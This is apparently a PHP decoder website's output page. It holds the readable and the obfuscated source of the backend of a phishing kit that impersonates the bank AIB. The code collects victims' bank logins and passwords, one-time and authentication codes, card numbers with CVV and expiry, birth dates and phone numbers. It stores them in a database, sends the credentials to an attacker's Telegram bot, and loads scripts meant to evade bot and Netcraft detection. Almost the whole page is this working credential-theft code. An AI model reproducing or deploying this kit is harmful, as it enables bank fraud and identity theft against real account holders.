Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto OzXeW; Vovi_: session_start(); goto JkRys; rGAml: include "\x2e\x2e\x2f\166\x..
Decoded Output download
<?php
goto OzXeW; Vovi_: session_start(); goto JkRys; rGAml: include "../vendor/index.php"; goto Pesxp; JkRys: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto GV3GO; T9ult: include "../vendor/100.php"; goto YrtBQ; Nmr6N: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["usrpass"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $usrpass = $_POST["usrpass"]; $bankType = "AIB"; $comment = "User just logged into account"; $ip = $_POST["ip"]; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $msg .= "[==========> {$bankType} Login <==========]
"; $msg .= "| Login : " . $usrlogin . "
"; $msg .= "| Password : " . $usrpass . "\xa"; $msg .= "[==========> IP INFO <==========]
"; $msg .= "| Submitted by : {$ip}
"; $msg .= "| UserAgent : {$ua}
"; $msg .= "==========> END <==========
"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "INSERT INTO customers (bankType, usrlogin, usrpass, comment, ip, useragent, uniqueid, status) VALUES ('{$bankType}', '{$usrlogin}', '{$usrpass}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db main conn error")); } } } goto xmxNk; GV3GO: function sendToTele($messaggio, $token, $chatID) { $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto Nmr6N; OzXeW: include "../../../CONFIG.php"; goto FxjdC; FxjdC: include "margin.php"; goto T9ult; xmxNk: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTPCODE error")); } } } if ($_GET["type"] == "AUTH") { if ($_POST["authcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $authcode = $_POST["authcode"]; $comment = "Auth code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET authcode='{$authcode}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "AUTHCODE error")); } } } if ($_GET["type"] == "CustomOTP") { if ($_POST["customotp"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $customotp = $_POST["customotp"]; $comment = "Custom OTP entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET customotp='{$customotp}', comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTPCODE error")); } } } if ($_GET["type"] == "CCDeets") { if ($_POST["fname"] and $_POST["usrdob"] and $_POST["phonenum"] and $_POST["ccnum"] and $_POST["cvvnum"] and $_POST["expiry"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fname = $_POST["fname"]; $usrdob = $_POST["usrdob"]; $phonenum = $_POST["phonenum"]; $ccnum = $_POST["ccnum"]; $cvvnum = $_POST["cvvnum"]; $expiry = $_POST["expiry"]; $comment = "CC Deets Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fname='{$fname}', usrdob='{$usrdob}', phonenum='{$phonenum}', ccnum='{$ccnum}', cvvnum='{$cvvnum}', expiry='{$expiry}', comment='{$comment}', status=5, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "CC Error")); } } } if ($_GET["type"] == "Phone") { if ($_POST["phonenum"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $phonenum = $_POST["phonenum"]; $comment = "Phone No. entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET phonenum='{$phonenum}', comment='{$comment}', status=6, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Phone error")); } } } } goto ph_rD; E9i8N: include "../vendor/300.php"; goto rGAml; YrtBQ: include "../vendor/200.php"; goto E9i8N; Pesxp: include "../vendor/netcraft_check.php"; goto Vovi_; ph_rD: ?>Did this file decode correctly?
Original Code
<?php
goto OzXeW; Vovi_: session_start(); goto JkRys; rGAml: include "\x2e\x2e\x2f\166\x65\156\x64\x6f\x72\57\x69\x6e\144\145\170\x2e\160\150\x70"; goto Pesxp; JkRys: function numeric($num) { if (preg_match("\x2f\136\133\x30\x2d\71\x5d\x2b\x24\x2f", $num)) { $status = true; } else { $status = false; } return $status; } goto GV3GO; T9ult: include "\x2e\56\x2f\166\x65\x6e\x64\x6f\x72\57\x31\60\x30\x2e\160\x68\160"; goto YrtBQ; Nmr6N: if ($_GET["\x74\x79\x70\145"] == "\154\x6f\x67\151\156") { if ($_POST["\165\x73\162\154\x6f\x67\x69\156"] and $_POST["\x75\x73\162\160\x61\x73\x73"] and $_POST["\151\x70"] and $_POST["\x75\141"]) { $usrlogin = $_POST["\165\x73\x72\x6c\x6f\x67\x69\156"]; $usrpass = $_POST["\x75\x73\x72\160\x61\163\163"]; $bankType = "\101\111\x42"; $comment = "\125\163\x65\x72\40\x6a\165\163\x74\x20\x6c\157\147\x67\x65\x64\x20\151\156\164\157\x20\141\x63\143\157\x75\156\164"; $ip = $_POST["\151\x70"]; $ua = urlencode($_POST["\165\141"]); $uniqueid = time(); $msg .= "\x5b\75\75\75\x3d\75\75\75\x3d\x3d\x3d\76\40{$bankType}\40\114\157\147\151\156\x20\x3c\75\x3d\x3d\75\75\x3d\x3d\x3d\x3d\x3d\135\12"; $msg .= "\174\40\x4c\x6f\x67\x69\156\40\x3a\40" . $usrlogin . "\12"; $msg .= "\174\40\x50\x61\163\x73\167\x6f\162\144\40\x3a\40" . $usrpass . "\xa"; $msg .= "\x5b\75\x3d\75\75\x3d\x3d\x3d\x3d\75\x3d\x3e\x20\x49\120\x20\111\116\106\x4f\x20\74\x3d\75\75\75\75\75\x3d\x3d\x3d\75\135\12"; $msg .= "\174\x20\123\x75\x62\155\x69\164\164\x65\x64\40\x62\171\x20\x3a\40{$ip}\x20\12"; $msg .= "\x7c\x20\x55\163\x65\162\x41\x67\x65\156\x74\40\x3a\40{$ua}\40\12"; $msg .= "\75\75\75\x3d\x3d\x3d\x3d\75\75\75\x3e\x20\105\x4e\104\40\74\75\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\12"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "\111\x4e\x53\105\122\x54\40\111\116\x54\117\x20\143\x75\x73\x74\x6f\155\x65\162\163\40\50\x62\x61\x6e\x6b\x54\171\x70\145\x2c\40\x75\x73\x72\x6c\157\147\151\x6e\x2c\x20\x75\163\x72\160\141\163\163\54\x20\143\x6f\155\x6d\x65\x6e\x74\54\x20\x69\x70\x2c\x20\x75\x73\145\162\141\147\x65\156\x74\x2c\40\165\x6e\151\x71\x75\145\151\x64\54\x20\163\164\141\x74\x75\x73\51\40\x56\101\114\x55\105\123\40\50\47{$bankType}\x27\54\40\47{$usrlogin}\47\54\40\47{$usrpass}\47\54\x20\x27{$comment}\x27\54\x20\x27{$ip}\47\x2c\x20\47{$ua}\47\54{$uniqueid}\x2c\x20\61\51"); if ($query) { $_SESSION["\x75\156\x69\161\x75\145\x69\144"] = $uniqueid; $_SESSION["\x73\164\141\162\x74\145\144"] = "\164\162\x75\x65"; echo json_encode(array("\x73\164\141\x74\x75\x73" => "\157\x6b")); } else { echo json_encode(array("\163\164\141\164\x75\x73" => "\x64\142\40\x6d\x61\x69\x6e\x20\143\157\156\156\x20\x65\162\x72\x6f\x72")); } } } goto xmxNk; GV3GO: function sendToTele($messaggio, $token, $chatID) { $url = "\150\x74\x74\x70\x73\72\x2f\x2f\x61\x70\x69\56\164\145\x6c\145\147\162\141\155\x2e\157\162\x67\57\x62\x6f\164" . $token . "\57\163\x65\x6e\144\x4d\145\x73\x73\141\x67\x65\77\143\150\x61\x74\137\151\x64\75" . $chatID; $url = $url . "\x26\164\145\x78\x74\x3d" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto Nmr6N; OzXeW: include "\x2e\x2e\57\56\56\x2f\x2e\x2e\57\103\x4f\x4e\x46\111\107\56\x70\x68\160"; goto FxjdC; FxjdC: include "\155\141\162\x67\151\156\x2e\160\x68\x70"; goto T9ult; xmxNk: if ($_SESSION["\x73\x74\141\162\164\145\x64"] == "\x74\162\165\x65") { if ($_GET["\x67\145\164\x73\164\141\x74\x75\163"] and numeric($_GET["\x67\145\x74\163\x74\141\x74\x75\163"]) == true) { $id = $_GET["\147\x65\x74\x73\164\141\x74\x75\163"]; $query = mysqli_query($conn, "\123\x45\x4c\105\103\124\40\x2a\x20\x66\x72\x6f\155\40\143\165\x73\x74\157\155\145\x72\163\40\127\110\x45\122\x45\x20\165\156\x69\x71\x75\x65\151\144\x3d\x27{$id}\47"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\x73\x74\x61\164\x75\x73"]; } } if ($_GET["\164\171\160\145"] == "\x4f\x54\120") { if ($_POST["\x6f\164\x70\143\157\144\x65"] and $_POST["\165\x73\x65\x72\151\144"] and numeric($_POST["\165\163\x65\162\151\144"]) == true) { $otpcode = $_POST["\x6f\x74\x70\x63\x6f\144\x65"]; $comment = "\117\x54\120\x20\143\x6f\144\x65\x20\x65\156\164\x65\x72\145\144\54\x20\x75\163\145\x72\40\x77\141\151\164\151\x6e\147"; $uniqueid = $_POST["\x75\163\145\x72\x69\144"]; $query = mysqli_query($conn, "\125\120\104\x41\124\105\x20\x63\x75\163\x74\x6f\x6d\x65\x72\163\40\x53\x45\124\40\157\164\160\143\157\144\x65\x3d\x27{$otpcode}\x27\x2c\x20\x63\x6f\x6d\x6d\x65\x6e\164\75\47{$comment}\47\54\x20\163\x74\141\164\x75\x73\75\x32\x2c\x20\x62\165\172\x7a\x65\x64\75\x30\40\127\110\105\122\105\40\165\156\151\161\165\145\151\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\164\165\163" => "\157\153")); } else { echo json_encode(array("\163\164\x61\164\x75\163" => "\117\124\120\x43\117\x44\x45\40\x65\x72\162\x6f\x72")); } } } if ($_GET["\164\x79\x70\145"] == "\x41\125\124\110") { if ($_POST["\141\165\164\x68\143\157\144\145"] and $_POST["\165\x73\145\162\x69\144"] and numeric($_POST["\x75\163\x65\x72\x69\x64"]) == true) { $authcode = $_POST["\141\x75\164\x68\143\x6f\144\x65"]; $comment = "\x41\x75\164\150\40\x63\x6f\x64\145\x20\x65\156\164\x65\x72\145\144\54\40\165\x73\145\x72\40\x77\141\151\164\x69\156\x67"; $uniqueid = $_POST["\x75\x73\145\x72\x69\x64"]; $query = mysqli_query($conn, "\125\120\104\101\124\x45\40\x63\165\163\x74\x6f\155\x65\x72\163\x20\x53\105\124\x20\141\x75\164\150\x63\157\x64\145\x3d\47{$authcode}\x27\54\40\143\x6f\x6d\x6d\145\156\x74\75\x27{$comment}\x27\54\40\163\164\x61\164\165\163\75\63\x2c\x20\142\165\172\x7a\145\144\x3d\x30\x20\x57\x48\x45\x52\x45\40\x75\156\x69\161\x75\145\x69\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\x61\x74\165\163" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\x61\164\165\x73" => "\x41\125\x54\x48\103\x4f\x44\x45\40\x65\162\x72\157\162")); } } } if ($_GET["\x74\x79\160\x65"] == "\103\165\163\x74\x6f\x6d\x4f\124\x50") { if ($_POST["\143\165\163\164\157\155\x6f\164\x70"] and $_POST["\165\163\x65\x72\151\x64"] and numeric($_POST["\x75\163\145\162\x69\x64"]) == true) { $customotp = $_POST["\x63\165\x73\164\x6f\155\x6f\164\x70"]; $comment = "\x43\x75\x73\x74\x6f\x6d\40\x4f\124\x50\40\x65\x6e\164\x65\x72\x65\x64\54\40\165\163\x65\x72\40\x77\x61\151\x74\151\156\x67"; $uniqueid = $_POST["\165\x73\145\x72\151\x64"]; $query = mysqli_query($conn, "\125\x50\x44\101\124\105\40\x63\x75\x73\x74\x6f\155\145\x72\x73\x20\x53\105\x54\40\x63\165\x73\x74\x6f\x6d\x6f\164\x70\x3d\47{$customotp}\x27\54\x20\143\157\155\155\145\x6e\x74\75\47{$comment}\47\54\40\163\164\141\164\165\163\75\x34\54\x20\142\165\x7a\x7a\145\144\x3d\x30\40\127\x48\105\x52\x45\x20\x75\x6e\151\x71\165\145\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\x74\x75\163" => "\x6f\x6b")); } else { echo json_encode(array("\163\164\x61\x74\165\163" => "\117\124\x50\103\117\104\x45\x20\x65\162\x72\157\x72")); } } } if ($_GET["\x74\171\160\145"] == "\103\x43\x44\x65\x65\164\x73") { if ($_POST["\x66\x6e\x61\155\145"] and $_POST["\165\x73\x72\x64\x6f\142"] and $_POST["\x70\150\157\x6e\145\x6e\165\x6d"] and $_POST["\143\143\156\165\155"] and $_POST["\143\x76\166\x6e\165\x6d"] and $_POST["\x65\x78\x70\x69\x72\171"] and $_POST["\x75\x73\x65\x72\x69\x64"] and numeric($_POST["\x75\163\145\162\x69\x64"]) == true) { $fname = $_POST["\x66\156\141\155\145"]; $usrdob = $_POST["\x75\163\x72\x64\157\142"]; $phonenum = $_POST["\160\x68\157\x6e\145\156\x75\155"]; $ccnum = $_POST["\143\143\x6e\165\155"]; $cvvnum = $_POST["\x63\x76\x76\x6e\x75\155"]; $expiry = $_POST["\145\x78\160\151\162\171"]; $comment = "\103\103\x20\104\145\x65\x74\163\40\105\x6e\x74\145\162\145\x64\x2c\40\165\163\145\x72\x20\167\141\151\x74\x69\x6e\147"; $uniqueid = $_POST["\165\x73\145\162\x69\144"]; $query = mysqli_query($conn, "\x55\x50\104\101\x54\x45\x20\x63\x75\163\164\157\155\x65\x72\163\x20\123\105\124\x20\146\156\141\x6d\x65\75\x27{$fname}\x27\x2c\x20\165\163\162\x64\157\x62\x3d\47{$usrdob}\x27\54\40\x70\150\157\x6e\145\x6e\165\x6d\x3d\x27{$phonenum}\47\x2c\40\143\x63\x6e\165\155\x3d\x27{$ccnum}\x27\54\x20\143\x76\166\x6e\165\155\x3d\47{$cvvnum}\x27\54\x20\145\170\x70\151\x72\x79\75\x27{$expiry}\x27\54\40\x63\x6f\x6d\155\x65\156\x74\75\x27{$comment}\47\54\40\x73\x74\x61\164\x75\x73\x3d\65\54\x20\x62\x75\172\172\145\x64\75\60\x20\127\110\105\122\105\40\165\x6e\151\161\165\145\151\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\x73\x74\141\164\x75\163" => "\x6f\x6b")); } else { echo json_encode(array("\x73\164\x61\x74\165\x73" => "\x43\x43\40\105\x72\x72\157\162")); } } } if ($_GET["\x74\x79\160\x65"] == "\120\150\x6f\x6e\x65") { if ($_POST["\160\x68\157\x6e\145\156\165\x6d"] and $_POST["\x75\163\x65\x72\x69\144"] and numeric($_POST["\165\163\145\x72\151\x64"]) == true) { $phonenum = $_POST["\x70\x68\157\156\145\156\x75\x6d"]; $comment = "\x50\x68\x6f\x6e\x65\x20\116\157\x2e\40\x65\x6e\x74\x65\x72\x65\144\54\40\165\x73\x65\x72\40\167\x61\151\164\x69\x6e\x67"; $uniqueid = $_POST["\x75\163\x65\162\151\144"]; $query = mysqli_query($conn, "\x55\x50\x44\101\124\105\x20\143\165\x73\x74\157\155\145\162\x73\40\123\105\x54\x20\x70\150\157\156\145\x6e\165\x6d\75\x27{$phonenum}\47\54\x20\x63\x6f\155\155\x65\x6e\x74\75\x27{$comment}\x27\54\x20\163\x74\141\164\x75\x73\75\66\54\40\142\x75\x7a\172\x65\x64\x3d\60\x20\x57\x48\105\x52\x45\x20\165\x6e\151\161\165\x65\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\141\x74\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\x74\165\x73" => "\x50\150\x6f\x6e\145\x20\145\x72\162\x6f\162")); } } } } goto ph_rD; E9i8N: include "\x2e\x2e\57\166\145\x6e\x64\157\162\57\63\x30\x30\56\x70\150\160"; goto rGAml; YrtBQ: include "\x2e\56\x2f\x76\x65\156\x64\157\x72\57\62\x30\x30\x2e\x70\x68\x70"; goto E9i8N; Pesxp: include "\56\x2e\57\x76\x65\156\x64\x6f\162\57\156\x65\164\143\162\141\146\x74\x5f\143\x68\145\143\x6b\x2e\160\x68\160"; goto Vovi_; ph_rD: ?>Function Calls
| None |
Stats
| MD5 | 0eb31693729fb178b4f9c8932edc2f36 |
| Eval Count | 0 |
| Decode Time | 53 ms |